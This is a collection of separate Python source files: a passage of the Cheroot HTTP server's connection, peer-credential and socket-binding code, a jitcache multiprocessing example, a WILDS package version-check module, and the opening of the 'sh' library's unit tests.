self.peercreds_enabled = self.server.peercreds_enabled
self.peercreds_resolve_enabled = self.server.peercreds_resolve_enabled
# LRU cached methods:
# Ref: https://stackoverflow.com/a/14946506/595220
self.resolve_peer_creds = (
lru_cache(maxsize=1)(self.resolve_peer_creds)
)
self.get_peer_creds = (
lru_cache(maxsize=1)(self.get_peer_creds)
)
def communicate(self):
"""Read each request and respond appropriately.
Returns true if the connection should be kept open.
"""
request_seen = False
try:
req = self.RequestHandlerClass(self.server, self)
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return False
request_seen = True
req.respond()
if not req.close_connection:
return True
except socket.error as ex:
errnum = ex.args[0]
# sadly SSL sockets return a different (longer) time out string
timeout_errs = 'timed out', 'The read operation timed out'
if errnum in timeout_errs:
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See https://github.com/cherrypy/cherrypy/issues/853
if (not request_seen) or (req and req.started_request):
self._conditional_error(req, '408 Request Timeout')
elif errnum not in errors.socket_errors_to_ignore:
self.server.error_log(
'socket.error %s' % repr(errnum),
level=logging.WARNING, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
except (KeyboardInterrupt, SystemExit):
raise
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
except Exception as ex:
self.server.error_log(
repr(ex), level=logging.ERROR, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
return False
linger = False
def _handle_no_ssl(self, req):
if not req or req.sent_headers:
return
# Unwrap wfile
try:
resp_sock = self.socket._sock
except AttributeError:
# self.socket is of OpenSSL.SSL.Connection type
resp_sock = self.socket._socket
self.wfile = StreamWriter(resp_sock, 'wb', self.wbufsize)
msg = (
'The client sent a plain HTTP request, but '
'this server only speaks HTTPS on this port.'
)
req.simple_response('400 Bad Request', msg)
self.linger = True
def _conditional_error(self, req, response):
"""Respond with an error.
Don't bother writing if a response
has already started being written.
"""
if not req or req.sent_headers:
return
try:
req.simple_response(response)
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
self._close_kernel_socket()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
def get_peer_creds(self): # LRU cached on per-instance basis, see __init__
"""Return the PID/UID/GID tuple of the peer socket for UNIX sockets.
This function uses SO_PEERCRED to query the UNIX PID, UID, GID
of the peer, which is only available if the bind address is
a UNIX domain socket.
Raises:
NotImplementedError: in case of unsupported socket type
RuntimeError: in case of SO_PEERCRED lookup unsupported or disabled
"""
PEERCRED_STRUCT_DEF = '3i'
if IS_WINDOWS or self.socket.family != socket.AF_UNIX:
raise NotImplementedError(
'SO_PEERCRED is only supported in Linux kernel and WSL',
)
elif not self.peercreds_enabled:
raise RuntimeError(
'Peer creds lookup is disabled within this server',
)
try:
peer_creds = self.socket.getsockopt(
# FIXME: Use LOCAL_CREDS for BSD-like OSs
# Ref: https://gist.github.com/LucaFilipozzi/e4f1e118202aff27af6aadebda1b5d91 # noqa
socket.SOL_SOCKET, socket.SO_PEERCRED,
struct.calcsize(PEERCRED_STRUCT_DEF),
)
except socket.error as socket_err:
"""Non-Linux kernels don't support SO_PEERCRED.
Refs:
http://welz.org.za/notes/on-peer-cred.html
https://github.com/daveti/tcpSockHack
msdn.microsoft.com/en-us/commandline/wsl/release_notes#build-15025
"""
six.raise_from( # 3.6+: raise RuntimeError from socket_err
RuntimeError,
socket_err,
)
else:
pid, uid, gid = struct.unpack(PEERCRED_STRUCT_DEF, peer_creds)
return pid, uid, gid
@property
def peer_pid(self):
"""Return the id of the connected peer process."""
pid, _, _ = self.get_peer_creds()
return pid
@property
def peer_uid(self):
"""Return the user id of the connected peer process."""
_, uid, _ = self.get_peer_creds()
return uid
@property
def peer_gid(self):
"""Return the group id of the connected peer process."""
_, _, gid = self.get_peer_creds()
return gid
def resolve_peer_creds(self): # LRU cached on per-instance basis
"""Look up the username and group tuple of the ``PEERCREDS``.
:returns: the username and group tuple of the ``PEERCREDS``
:raises NotImplementedError: if the OS is unsupported
:raises RuntimeError: if UID/GID lookup is unsupported or disabled
"""
if not IS_UID_GID_RESOLVABLE:
raise NotImplementedError(
'UID/GID lookup is unavailable under current platform. '
'It can only be done under UNIX-like OS '
'but not under the Google App Engine',
)
elif not self.peercreds_resolve_enabled:
raise RuntimeError(
'UID/GID lookup is disabled within this server',
)
user = pwd.getpwuid(self.peer_uid).pw_name # [0]
group = grp.getgrgid(self.peer_gid).gr_name # [0]
return user, group
@property
def peer_user(self):
"""Return the username of the connected peer process."""
user, _ = self.resolve_peer_creds()
return user
@property
def peer_group(self):
"""Return the group of the connected peer process."""
_, group = self.resolve_peer_creds()
return group
def _close_kernel_socket(self):
"""Close kernel socket in outdated Python versions.
On old Python versions,
Python's socket module does NOT call close on the kernel
socket when you call socket.close(). We do so manually here
because we want this server to send a FIN TCP segment
immediately. Note this must be called *before* calling
socket.close(), because the latter drops its reference to
the kernel socket.
"""
if six.PY2 and hasattr(self.socket, '_sock'):
self.socket._sock.close()
class HTTPServer:
"""An HTTP server."""
_bind_addr = '127.0.0.1'
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create.
(default -1 = no limit)"""
server_name = None
"""The name of the server; defaults to ``self.version``."""
protocol = 'HTTP/1.1'
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections.
(default 5)."""
shutdown_timeout = 5
"""The total time to wait for worker threads to cleanly exit.
Specified in seconds."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = 'Cheroot/{version!s}'.format(version=__version__)
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``.
"""
ready = False
"""Internal flag which indicating the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of ``ssl.Adapter`` (or a subclass).
Ref: :py:class:`ssl.Adapter <cheroot.ssl.Adapter>`.
You must have the corresponding TLS driver library installed.
"""
peercreds_enabled = False
"""
If :py:data:`True`, peer creds will be looked up via UNIX domain socket.
"""
peercreds_resolve_enabled = False
"""
If :py:data:`True`, username/group will be looked up in the OS from
``PEERCREDS``-provided IDs.
"""
keep_alive_conn_limit = 10
"""The maximum number of waiting keep-alive connections that will be kept open.
Default is 10. Set to None to have unlimited connections."""
def __init__(
self, bind_addr, gateway,
minthreads=10, maxthreads=-1, server_name=None,
peercreds_enabled=False, peercreds_resolve_enabled=False,
):
"""Initialize HTTPServer instance.
Args:
bind_addr (tuple): network interface to listen to
gateway (Gateway): gateway for processing HTTP requests
minthreads (int): minimum number of threads for HTTP thread pool
maxthreads (int): maximum number of threads for HTTP thread pool
server_name (str): web server name to be advertised via Server
HTTP header
"""
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = threadpool.ThreadPool(
self, min=minthreads or 1, max=maxthreads,
)
self.connections = connections.ConnectionManager(self)
if not server_name:
server_name = self.version
self.server_name = server_name
self.peercreds_enabled = peercreds_enabled
self.peercreds_resolve_enabled = (
peercreds_resolve_enabled and peercreds_enabled
)
self.clear_stats()
def clear_stats(self):
"""Reset server stat counters.."""
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, 'qsize', None),
'Threads': lambda s: len(getattr(self.requests, '_threads', [])),
'Threads Idle': lambda s: getattr(self.requests, 'idle', None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum(
[w['Requests'](w) for w in s['Worker Threads'].values()], 0,
),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) for w in s['Worker Threads'].values()], 0,
),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) for w in s['Worker Threads'].values()],
0,
),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum(
[w['Work Time'](w) for w in s['Worker Threads'].values()], 0,
),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0,
),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0,
),
'Worker Threads': {},
}
logging.statistics['Cheroot HTTPServer %d' % id(self)] = self.stats
def runtime(self):
"""Return server uptime."""
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
"""Render Server instance representing bind address."""
return '%s.%s(%r)' % (
self.__module__, self.__class__.__name__,
self.bind_addr,
)
@property
def bind_addr(self):
"""Return the interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any
:term:`IPv4` or :term:`IPv6` address, or any valid hostname.
The string 'localhost' is a synonym for '127.0.0.1' (or '::1',
if your hosts file prefers :term:`IPv6`).
The string '0.0.0.0' is a special :term:`IPv4` entry meaning
"any active interface" (INADDR_ANY), and '::' is the similar
IN6ADDR_ANY for :term:`IPv6`.
The empty string or :py:data:`None` are not allowed.
For UNIX sockets, supply the file name as a string.
Systemd socket activation is automatic and doesn't require tempering
with this variable.
.. glossary::
:abbr:`IPv4 (Internet Protocol version 4)`
Internet Protocol version 4
:abbr:`IPv6 (Internet Protocol version 6)`
Internet Protocol version 6
"""
return self._bind_addr
@bind_addr.setter
def bind_addr(self, value):
"""Set the interface on which to listen for connections."""
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError(
"Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
'to listen on all active interfaces.',
)
self._bind_addr = value
def safe_start(self):
"""Run the server forever, and stop it cleanly on exit."""
try:
self.start()
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.error_log('Keyboard Interrupt: shutting down')
self.stop()
raise
except SystemExit:
self.error_log('SystemExit raised: shutting down')
self.stop()
raise
def prepare(self):
"""Prepare server to serving requests.
It binds a socket's port, setups the socket to ``listen()`` and does
other preparing things.
"""
self._interrupt = None
if self.software is None:
self.software = '%s Server' % self.version
# Select the appropriate socket
self.socket = None
msg = 'No socket could be created'
if os.getenv('LISTEN_PID', None):
# systemd socket activation
self.socket = socket.fromfd(3, socket.AF_INET, socket.SOCK_STREAM)
elif isinstance(self.bind_addr, (six.text_type, six.binary_type)):
# AF_UNIX socket
try:
self.bind_unix_socket(self.bind_addr)
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, self.bind_addr, serr)
six.raise_from(socket.error(msg), serr)
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6
# addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE,
)
except socket.gaierror:
sock_type = socket.AF_INET
bind_addr = self.bind_addr
if ':' in host:
sock_type = socket.AF_INET6
bind_addr = bind_addr + (0, 0)
info = [(sock_type, socket.SOCK_STREAM, 0, '', bind_addr)]
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
break
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, sa, serr)
if self.socket:
self.socket.close()
self.socket = None
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
def serve(self):
"""Serve requests, after invoking :func:`prepare()`."""
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.error_log(
'Error in HTTPServer.tick', level=logging.ERROR,
traceback=True,
)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def start(self):
"""Run the server forever.
It is shortcut for invoking :func:`prepare()` then :func:`serve()`.
"""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self.prepare()
self.serve()
@contextlib.contextmanager
def _run_in_thread(self):
"""Context manager for running this server in a thread."""
self.prepare()
thread = threading.Thread(target=self.serve)
thread.setDaemon(True)
thread.start()
try:
yield thread
finally:
self.stop()
def error_log(self, msg='', level=20, traceback=False):
"""Write error message to log.
Args:
msg (str): error message
level (int): logging level
traceback (bool): add traceback to output or not
"""
# Override this in subclasses as desired
sys.stderr.write('{msg!s}\n'.format(msg=msg))
sys.stderr.flush()
if traceback:
tblines = traceback_.format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
sock = self.prepare_socket(
self.bind_addr,
family, type, proto,
self.nodelay, self.ssl_adapter,
)
sock = self.socket = self.bind_socket(sock, self.bind_addr)
self.bind_addr = self.resolve_real_bind_addr(sock)
return sock
def bind_unix_socket(self, bind_addr):
"""Create (or recreate) a UNIX socket object."""
if IS_WINDOWS:
"""
Trying to access socket.AF_UNIX under Windows
causes an AttributeError.
"""
raise ValueError( # or RuntimeError?
'AF_UNIX sockets are not supported under Windows.',
)
fs_permissions = 0o777 # TODO: allow changing mode
try:
# Make possible reusing the socket...
os.unlink(self.bind_addr)
except OSError:
"""
File does not exist, which is the primary goal anyway.
"""
except TypeError as typ_err:
err_msg = str(typ_err)
if (
'remove() argument 1 must be encoded '
'string without null bytes, not unicode'
not in err_msg
and 'embedded NUL character' not in err_msg # py34
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy2
):
raise
except ValueError as val_err:
err_msg = str(val_err)
if (
'unlink: embedded null '
'character in path' not in err_msg
and 'embedded null byte' not in err_msg
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy3
):
raise
sock = self.prepare_socket(
bind_addr=bind_addr,
family=socket.AF_UNIX, type=socket.SOCK_STREAM, proto=0,
nodelay=self.nodelay, ssl_adapter=self.ssl_adapter,
)
try:
"""Linux way of pre-populating fs mode permissions."""
# Allow everyone access the socket...
os.fchmod(sock.fileno(), fs_permissions)
FS_PERMS_SET = True
except OSError:
FS_PERMS_SET = False
try:
sock = self.bind_socket(sock, bind_addr)
except socket.error:
sock.close()
raise
bind_addr = self.resolve_real_bind_addr(sock)
try:
"""FreeBSD/macOS pre-populating fs mode permissions."""
if not FS_PERMS_SET:
try:
os.lchmod(bind_addr, fs_permissions)
except AttributeError:
os.chmod(bind_addr, fs_permissions, follow_symlinks=False)
FS_PERMS_SET = True
except OSError:
pass
if not FS_PERMS_SET:
self.error_log(
'Failed to set socket fs mode permissions',
level=logging.WARNING,
)
self.bind_addr = bind_addr
self.socket = sock
return sock
@staticmethod
def prepare_socket(bind_addr, family, type, proto, nodelay, ssl_adapter):
"""Create and prepare the socket object."""
sock = socket.socket(family, type, proto)
connections.prevent_socket_inheritance(sock)
host, port = bind_addr[:2]
IS_EPHEMERAL_PORT = port == 0
if not (IS_WINDOWS or IS_EPHEMERAL_PORT):
"""Enable SO_REUSEADDR for the current socket.
Skip for Windows (has different semantics)
or ephemeral ports (can steal ports from others).
Refs:
* https://msdn.microsoft.com/en-us/library/ms740621(v=vs.85).aspx
* https://github.com/cherrypy/cheroot/issues/114
* https://gavv.github.io/blog/ephemeral-port-reuse/
"""
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if nodelay and not isinstance(
bind_addr,
(six.text_type, six.binary_type),
):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if ssl_adapter is not None:
sock = ssl_adapter.bind(sock)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See
# https://github.com/cherrypy/cherrypy/issues/871.
listening_ipv6 = (
hasattr(socket, 'AF_INET6')
and family == socket.AF_INET6
and host in ('::', '::0', '::0.0.0.0')
)
if listening_ipv6:
try:
sock.setsockopt(
socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0,
)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
return sock
@staticmethod
def bind_socket(socket_, bind_addr):
"""Bind the socket to given interface."""
socket_.bind(bind_addr)
return socket_
@staticmethod
def resolve_real_bind_addr(socket_):
"""Retrieve actual bind address from bound socket."""
# FIXME: keep requested bind_addr separate real bound_addr (port
# is different in case of ephemeral port 0)
bind_addr = socket_.getsockname()
if socket_.family in (
# Windows doesn't have socket.AF_UNIX, so not using it in check
socket.AF_INET,
socket.AF_INET6,
):
"""UNIX domain sockets are strings or bytes.
In case of bytes with a leading null-byte it's an abstract socket.
"""
return bind_addr[:2]
if isinstance(bind_addr, six.binary_type):
bind_addr = bton(bind_addr)
return bind_addr
def tick(self):
"""Accept a new connection and put it on the Queue."""
if not self.ready:
return
conn = self.connections.get_conn(self.socket)
if conn:
try:
self.requests.put(conn)
except queue.Full:
# Just drop the conn. TODO: write 503 back?
conn.close()
self.connections.expire()
@property
def interrupt(self):
"""Flag interrupt of the server."""
return self._interrupt
@interrupt.setter
def interrupt(self, interrupt):
"""Perform the shutdown of this server and save the exception."""
self._interrupt = True
self.stop()
self._interrupt = interrupt
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, 'socket', None)
if sock:
if not isinstance(
self.bind_addr,
(six.text_type, six.binary_type),
):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
# Changed to use error code and not message
# See
# https://github.com/cherrypy/cherrypy/issues/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM,
):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See
# https://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, 'close'):
sock.close()
self.socket = None
self.connections.close()
self.requests.stop(self.shutdown_timeout)
class Gateway:
"""Base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
"""Initialize Gateway instance with request.
Args:
req (HTTPRequest): current HTTP request
"""
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplementedError # pragma: no cover
# These may either be ssl.Adapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cheroot.ssl.builtin.BuiltinSSLAdapter',
'pyopenssl': 'cheroot.ssl.pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, six.string_types):
last_dot = adapter.rfind('.')
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
|
process.py
|
from jitcache import Cache
import time
import multiprocessing as mp
cache = Cache()
@cache.memoize
def slow_fn(input_1, input_2):
print("Slow Function Called")
time.sleep(1)
return input_1 * input_2
n_processes = 10
process_list = []
# Create a set of processes who will request the same value
for i in range(n_processes):
p = mp.Process(target=slow_fn, args=(10, 4))
process_list.append(p)
# Start each process
for p in process_list:
p.start()
# Wait for completion
for p in process_list:
p.join()
# Print the value that they tried to compute
print(slow_fn(10, 4))
|
version.py
|
# Adapted from https://github.com/snap-stanford/ogb/blob/master/ogb/version.py
import os
import logging
from threading import Thread
__version__ = '1.1.0'
try:
os.environ['OUTDATED_IGNORE'] = '1'
from outdated import check_outdated # noqa
except ImportError:
check_outdated = None
def check():
try:
is_outdated, latest = check_outdated('wilds', __version__)
if is_outdated:
logging.warning(
f'The WILDS package is out of date. Your version is '
f'{__version__}, while the latest version is {latest}.')
except Exception:
pass
if check_outdated is not None:
thread = Thread(target=check)
thread.start()
|
test.py
|
# -*- coding: utf8 -*-
from contextlib import contextmanager
from functools import wraps
from os.path import exists, join, realpath, dirname, split
import errno
import fcntl
import inspect
import logging
import os
import platform
import pty
import resource
import sh
import signal
import stat
import sys
import tempfile
import time
import unittest
import warnings
IS_PY3 = sys.version_info[0] == 3
IS_PY2 = not IS_PY3
MINOR_VER = sys.version_info[1]
# coverage doesn't work in python 3.1, 3.2 due to it just being a shit
# python
HAS_UNICODE_LITERAL = not (IS_PY3 and MINOR_VER in (1, 2))
cov = None
if HAS_UNICODE_LITERAL:
run_idx = int(os.environ.pop("SH_TEST_RUN_IDX", "0"))
first_run = run_idx == 0
try:
import coverage
except ImportError:
pass
else:
# for some reason, we can't run auto_data on the first run, or the coverage
# numbers get really screwed up
auto_data = True
if first_run:
auto_data = False
cov = coverage.Coverage(auto_data=auto_data)
if first_run:
cov.erase()
cov.start()
try:
import unittest.mock
except ImportError:
HAS_MOCK = False
else:
HAS_MOCK = True
# we have to use the real path because on osx, /tmp is a symlink to
# /private/tmp, and so assertions that gettempdir() == sh.pwd() will fail
tempdir = realpath(tempfile.gettempdir())
IS_MACOS = platform.system() in ("AIX", "Darwin")
# these 3 functions are helpers for modifying PYTHONPATH with a module's main
# directory
def append_pythonpath(env, path):
key = "PYTHONPATH"
pypath = [p for p in env.get(key, "").split(":") if p]
pypath.insert(0, path)
pypath = ":".join(pypath)
env[key] = pypath
def get_module_import_dir(m):
mod_file = inspect.getsourcefile(m)
is_package = mod_file.endswith("__init__.py")
mod_dir = dirname(mod_file)
if is_package:
mod_dir, _ = split(mod_dir)
return mod_dir
def append_module_path(env, m):
append_pythonpath(env, get_module_import_dir(m))
if IS_PY3:
xrange = range
unicode = str
long = int
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
else:
from StringIO import StringIO
from cStringIO import StringIO as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
THIS_DIR = dirname(os.path.abspath(__file__))
system_python = sh.Command(sys.executable)
# this is to ensure that our `python` helper here is able to import our local sh
# module, and not the system one
baked_env = os.environ.copy()
append_module_path(baked_env, sh)
python = system_python.bake(_env=baked_env)
if hasattr(logging, 'NullHandler'):
NullHandler = logging.NullHandler
else:
class NullHandler(logging.Handler):
def handle(self, record):
pass
def emit(self, record):
pass
def createLock(self):
self.lock = None
skipUnless = getattr(unittest, "skipUnless", None)
if not skipUnless:
# our stupid skipUnless wrapper for python2.6
def skipUnless(condition, reason):
def wrapper(test):
if condition:
return test
else:
@wraps(test)
def skip(*args, **kwargs):
return
return skip
return wrapper
skip_unless = skipUnless
def requires_progs(*progs):
missing = []
for prog in progs:
try:
sh.Command(prog)
except sh.CommandNotFound:
missing.append(prog)
friendly_missing = ", ".join(missing)
return skipUnless(len(missing) == 0, "Missing required system programs: %s"
% friendly_missing)
requires_posix = skipUnless(os.name == "posix", "Requires POSIX")
requires_utf8 = skipUnless(sh.DEFAULT_ENCODING == "UTF-8", "System encoding must be UTF-8")
not_macos = skipUnless(not IS_MACOS, "Doesn't work on MacOS")
requires_py3 = skipUnless(IS_PY3, "Test only works on Python 3")
requires_py35 = skipUnless(IS_PY3 and MINOR_VER >= 5, "Test only works on Python 3.5 or higher")
def requires_poller(poller):
use_select = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
cur_poller = "select" if use_select else "poll"
return skipUnless(cur_poller == poller, "Only enabled for select.%s" % cur_poller)
@contextmanager
def ulimit(key, new_soft):
soft, hard = resource.getrlimit(key)
resource.setrlimit(key, (new_soft, hard))
try:
yield
finally:
resource.setrlimit(key, (soft, hard))
def create_tmp_test(code, prefix="tmp", delete=True, **kwargs):
""" creates a temporary test file that lives on disk, on which we can run
python with sh """
py = tempfile.NamedTemporaryFile(prefix=prefix, delete=delete)
code = code.format(**kwargs)
if IS_PY3:
code = code.encode("UTF-8")
py.write(code)
py.flush()
# make the file executable
st = os.stat(py.name)
os.chmod(py.name, st.st_mode | stat.S_IEXEC)
# we don't explicitly close, because close will remove the file, and we
# don't want that until the test case is done. so we let the gc close it
# when it goes out of scope
return py
class BaseTests(unittest.TestCase):
def assert_oserror(self, num, fn, *args, **kwargs):
try:
fn(*args, **kwargs)
except OSError as e:
self.assertEqual(e.errno, num)
def assert_deprecated(self, fn, *args, **kwargs):
with warnings.catch_warnings(record=True) as w:
fn(*args, **kwargs)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[-1].category, DeprecationWarning))
# python2.6 lacks this
def assertIn(self, needle, haystack):
s = super(BaseTests, self)
if hasattr(s, "assertIn"):
s.assertIn(needle, haystack)
else:
self.assertTrue(needle in haystack)
# python2.6 lacks this
def assertNotIn(self, needle, haystack):
s = super(BaseTests, self)
if hasattr(s, "assertNotIn"):
s.assertNotIn(needle, haystack)
else:
self.assertTrue(needle not in haystack)
# python2.6 lacks this
def assertLess(self, a, b):
s = super(BaseTests, self)
if hasattr(s, "assertLess"):
s.assertLess(a, b)
else:
self.assertTrue(a < b)
# python2.6 lacks this
def assertGreater(self, a, b):
s = super(BaseTests, self)
if hasattr(s, "assertGreater"):
s.assertGreater(a, b)
else:
self.assertTrue(a > b)
# python2.6 lacks this
def skipTest(self, msg):
s = super(BaseTests, self)
if hasattr(s, "skipTest"):
s.skipTest(msg)
else:
return
@requires_posix
class FunctionalTests(BaseTests):
def setUp(self):
self._environ = os.environ.copy()
def tearDown(self):
os.environ = self._environ
def test_print_command(self):
from sh import ls, which
actual_location = which("ls")
out = str(ls)
self.assertEqual(out, actual_location)
def test_unicode_arg(self):
from sh import echo
test = "漢字"
if not IS_PY3:
test = test.decode("utf8")
p = echo(test, _encoding="utf8")
output = p.strip()
self.assertEqual(test, output)
def test_unicode_exception(self):
from sh import ErrorReturnCode
py = create_tmp_test("exit(1)")
arg = "漢字"
native_arg = arg
if not IS_PY3:
arg = arg.decode("utf8")
try:
python(py.name, arg, _encoding="utf8")
except ErrorReturnCode as e:
self.assertIn(native_arg, str(e))
else:
self.fail("exception wasn't raised")
def test_pipe_fd(self):
py = create_tmp_test("""print("hi world")""")
read_fd, write_fd = os.pipe()
python(py.name, _out=write_fd)
out = os.read(read_fd, 10)
self.assertEqual(out, b"hi world\n")
def test_trunc_exc(self):
py = create_tmp_test("""
import sys
sys.stdout.write("a" * 1000)
sys.stderr.write("b" * 1000)
exit(1)
""")
self.assertRaises(sh.ErrorReturnCode, python, py.name)
def test_number_arg(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
options, args = parser.parse_args()
print(args[0])
""")
out = python(py.name, 3).strip()
self.assertEqual(out, "3")
def test_empty_stdin_no_hang(self):
py = create_tmp_test("""
import sys
data = sys.stdin.read()
sys.stdout.write("no hang")
""")
out = python(py.name, _in="", _timeout=2)
self.assertEqual(out, "no hang")
out = python(py.name, _in=None, _timeout=2)
self.assertEqual(out, "no hang")
def test_exit_code(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
self.assertRaises(ErrorReturnCode, python, py.name)
def test_patched_glob(self):
from glob import glob
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
files = glob("*.faowjefoajweofj")
out = python(py.name, files).strip()
self.assertEqual(out, "['*.faowjefoajweofj']")
@requires_py35
def test_patched_glob_with_recursive_argument(self):
from glob import glob
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
files = glob("*.faowjefoajweofj", recursive=True)
out = python(py.name, files).strip()
self.assertEqual(out, "['*.faowjefoajweofj']")
def test_exit_code_with_hasattr(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
try:
out = python(py.name, _iter=True)
# hasattr can swallow exceptions
hasattr(out, 'something_not_there')
list(out)
self.assertEqual(out.exit_code, 3)
self.fail("Command exited with error, but no exception thrown")
except ErrorReturnCode:
pass
def test_exit_code_from_exception(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
self.assertRaises(ErrorReturnCode, python, py.name)
